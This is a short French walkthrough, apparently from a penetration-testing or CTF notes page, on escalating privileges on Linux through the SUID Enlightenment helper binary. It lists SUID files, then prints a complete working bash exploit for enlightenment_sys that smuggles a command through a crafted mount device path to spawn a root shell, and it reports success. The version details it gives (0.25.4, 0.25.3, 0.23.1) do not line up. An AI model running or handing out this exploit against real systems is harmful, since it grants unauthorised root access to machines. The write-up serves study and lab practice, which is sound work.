SUID (Enlightenment) - Linux Privilege Escalation

Nous commençons par rechercher les fichiers SUID appartenant à notre utilisateur. Pour ce faire, exécutez la commande suivante :

find / -perm -4000 2>/dev/null

En analysant la sortie, nous remarquons la présence du binaire enlightenment.

Nous explorons les vulnérabilités associées à ce binaire. Après quelques recherches, nous identifions un exploit applicable pour la version 0.25.4.

Enlightenment v0.25.3 - Privilege escalationExploit Database

Cependant, en vérifiant la version actuelle d'Enlightenment installée sur le système, nous trouvons qu'il s'agit de la version 0.23.1, une version plus ancienne.

Nous testons l'exploit suivant pour exploiter la vulnérabilité :

#!/usr/bin/bash

file="/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"
echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net
rm -rf /tmp/exploit
rm -rf /tmp/net

./exploit.sh

Après l'exécution de l'exploit, nous obtenons un shell avec les privilèges root.

Mis à jour il y a 1 an